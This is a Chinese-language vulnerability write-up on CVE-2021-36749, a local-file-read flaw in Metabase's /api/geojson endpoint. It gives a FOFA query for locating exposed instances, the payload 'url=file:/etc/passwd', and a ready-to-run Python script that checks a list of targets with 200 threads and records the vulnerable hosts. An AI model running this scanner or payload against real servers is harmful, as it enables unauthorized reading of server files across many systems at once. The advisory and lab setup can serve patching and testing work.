0x01 漏洞描述
Metabase 是一个简单、开源的数据分析平台。其自定义 GeoJSON 地图功能(admin->settings->maps->custom maps->add a map)对应的 /api/geojson 接口缺少权限验证,且 url 参数未限制协议(可使用 file:),未授权的攻击者可借此读取服务器本地文件,获得敏感信息。
0x02 影响范围
影响版本:
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
0x03 FOFA 查询
app="metabase"
0x04 环境搭建
docker run -d -p 3000:3000 --name metabase metabase/metabase:v0.40.4
0x05 漏洞复现
/api/geojson?url=file:/etc/passwd
0x06 批量脚本
# -*- coding: utf-8 -*-
# @Time : 2021/11/21 17:37
# @Auth : AD钙奶
import requests
import threadpool
# Silence urllib3 warnings globally; verify() below calls requests.get(..., verify=False),
# which would otherwise emit a warning for every unverified TLS connection.
requests.packages.urllib3.disable_warnings()
def verify(urls):
    """Probe one Metabase base URL for the CVE-2021-36749 local-file read.

    Builds the ``/api/geojson?url=file:/etc/passwd`` request shown in section
    0x05 and treats the substring ``root`` in the response body as a hit; a hit
    is appended to vuln.txt via save_vuln() and echoed to stdout.

    Args:
        urls: one base URL (scheme and host) read from url.txt. Despite the
            plural name this is a single string, not a list.

    Returns:
        None. Results are reported only through the side effects above.
    """
    url = urls + '/api/geojson?url=file:/etc/passwd'
    # Browser-like User-Agent only; nothing else about the request is disguised,
    # so the request path and the `url=file:` query are the reliable log signal.
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"}
    try:
        # verify=False: certificate errors are ignored. allow_redirects=False: a
        # 30x answer is not followed; the redirect response's own body is what
        # gets checked below.
        res = requests.get(url, headers=headers, timeout=10, verify=False, allow_redirects=False)
        # Weak match: any body containing "root" counts as vulnerable, so an
        # unrelated page mentioning that word is a false positive.
        if 'root' in res.text:
            info = "[+] 存在CVE-2021-36749漏洞: " + urls
            save_vuln(info)
            print(info)
    except Exception as e:
        # print(e)
        # Connection errors, timeouts and every other failure are swallowed
        # silently; an unreachable host is indistinguishable from a patched one.
        pass
def save_vuln(info):
    """Append one result line to vuln.txt in the current directory.

    Args:
        info: the message to record. A trailing newline is added here so the
            file stays one entry per line.
    """
    with open("vuln.txt", 'a', encoding='utf-8') as sink:
        sink.write(info + '\n')
def get_file_url():
    """Read url.txt (one base URL per line) and return its non-blank lines.

    Returns:
        list[str]: the lines in file order, each stripped of surrounding
        whitespace; blank and whitespace-only lines are dropped.
    """
    with open("url.txt", 'r', encoding='UTF-8') as handle:
        stripped = map(str.strip, handle.readlines())
    return list(filter(None, stripped))
def main():
    """Entry point: read targets from url.txt and run verify() on each via a thread pool.

    Fans the targets out over a threadpool.ThreadPool of 200 workers and blocks
    until every request has finished; results are written by verify() itself.
    """
    targets = get_file_url()
    # 200 concurrent workers; each worker issues the single request built in verify().
    workers = threadpool.ThreadPool(200)
    for work_item in threadpool.makeRequests(verify, targets):
        workers.putRequest(work_item)
    workers.wait()
if __name__ == "__main__":
    # Run only when executed as a script, not when imported.
    main()
0x07 参考链接
https://mp.weixin.qq.com/s/XNwQuALcVmaK5Zb-3mTBzA